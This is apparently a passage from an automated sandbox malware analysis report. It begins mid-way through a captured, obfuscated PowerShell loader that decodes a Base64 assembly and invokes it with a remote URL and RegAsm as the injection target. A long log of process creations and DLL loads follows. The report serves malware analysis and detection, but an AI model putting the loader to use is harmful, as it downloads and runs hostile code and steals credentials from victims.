[System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\icthiyu"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\swyajqfles"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\swyajqfles"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\vzdkjbynsalyk"
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
